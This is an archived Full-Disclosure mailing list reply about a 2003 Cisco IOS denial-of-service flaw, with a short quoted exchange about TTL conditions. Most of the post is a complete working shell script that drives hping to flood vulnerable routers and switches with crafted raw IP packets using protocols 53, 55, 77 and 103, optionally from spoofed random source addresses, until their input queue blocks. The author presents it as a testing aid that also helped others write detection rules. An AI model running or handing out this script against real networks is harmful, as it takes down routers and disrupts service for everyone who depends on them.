lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
From: PDonahue at acmicorp.com (Donahue, Pat)
Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover

Here's a simple script I wrote to test our routers and switches.. maybe it will come in handy for your research. I also sent an early version to the snort-users list to help them develop rules. Basically it just wraps hping (http://www.hping.org) with parameters passed on the command line. Try targeting a host inside the network and playing around with the TTL.

--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation

--- BEGIN cisco-44020.sh ---
#!/bin/sh

# 2003-07-21 pdonahue
# cisco-44020.sh
# -- this shell script is just a wrapper for hping (http://www.hping.org)
#    with the parameters necessary to fill the input queue on exploitable IOS device
# -- refer to "Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packets"
#    (http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml) for more information

HPING=/usr/local/sbin/hping
# -- change this path to match the location of hping on your system

# set defaults
PROT=a
ADDR=r
NUMB=76
SIZE=26

# check usage
if [ "$#" -lt "2" ]; then
    echo "usage: $0 <hostname|address> <ttl> [-p<protocol>] [-a<address>] [-n<packets>] [-s<size>]"
    echo "        required:"
    echo "            <hostname|address> is the target device (router/switch)"
    echo "            <ttl> must be set so the packets expire (TTL=0) at the device"
    echo "        optional:"
    echo "            -p <protocol> is (a)ll, (53)swipe, (55)ip mobility, (77)sun nd, or (103)pim"
    echo "            -a <address>  is the source address of the packets; (r)andom or x.x.x.x"
    echo "            -n <packets>  is the number of packets to send"
    echo "            -s <size>     is the size of the payload in bytes"
    echo "        defaults:"
    echo "            $0 <hostname|address> <ttl> -p$PROT -a$ADDR -n$NUMB -s$SIZE"
    echo "        examples:"
    echo "            $0 10.0.0.1 0"
    echo "            76 (each proto)  26-byte packets : random add. -> 10.0.0.1"
    echo "            $0 10.0.0.100 11 -ps -a10.0.0.1 -n76 -s256"
    echo "            76 (swipe only) 512-byte packets : 10.0.0.1    -> 10 hops -> 10.0.0.100"
    exit
else
    HOST=$1; shift; TTL=$1; shift;
fi

# parse arguments
while getopts p:a:n:s: o
do  case "$o" in
    p)  # set the protocol
        PROT="$OPTARG"
        ;;
    a)  # set the source address
        [ "$OPTARG" != "r" ] && ADDR="-a $OPTARG"
        ;;
    n)  # set the number of packets
        NUMB="$OPTARG"
        ;;
    s)  # set the size of the payload
        SIZE="$OPTARG"
        ;;
    esac
done

# replace defaults with appropriate values if still set
[ "$PROT" = "a" ] && PROT="53 55 77 103"
[ "$ADDR" = "r" ] && ADDR="--rand-source"

# send the packets
for protocol in $PROT
    do
       $HPING $HOST --rawip $ADDR --ttl $TTL --ipproto $protocol --count $NUMB --interval u250 --data $SIZE --file /dev/urandom
    done
    exit
fi
--- END cisco-44020.sh ---

-----Original Message-----
From: tcleary2@....com.au [mailto:tcleary2@....com.au]
Sent: Thursday, July 24, 2003 10:36 PM
To: lee.e.rian@...sus.gov
Cc: full-disclosure@...ts.netsys.com
Subject: RE: [Full-Disclosure] Re: Cisco IOS Denial of Service that
affects most Cisco IOS routers- requires power cycle to recover


Guys,

>So... has anyone been able to verify that the problem occurs when the TTL
>expires without the packet being addressed to the router?  Or is it a
>requirement that the evil packet be addressed to the router?

As far as we know, the TTL has to go to 1/0 on the target  IP address.

Haven't been able to get the effect on a transit packet. 

Regards,

tom.
__________________________________________________
Security Consultant/Analyst
CSC
Ph: +61 8 9429 6478    Email: tcleary2@....com.au
----------------------------------------------------------------------------------------
This email, including any attachments, is intended only for use by the 
addressee(s) and may contain confidential and/or personal information and 
may also be the subject of legal privilege. Any personal information 
contained in this email is not to be used or disclosed for any purpose 
other than the purpose for which you have received it. If you are not the 
intended recipient, you must not disclose or use the information contained 
in it. In this case, please let me know by return email, delete the 
message permanently from your system and destroy any copies.
----------------------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ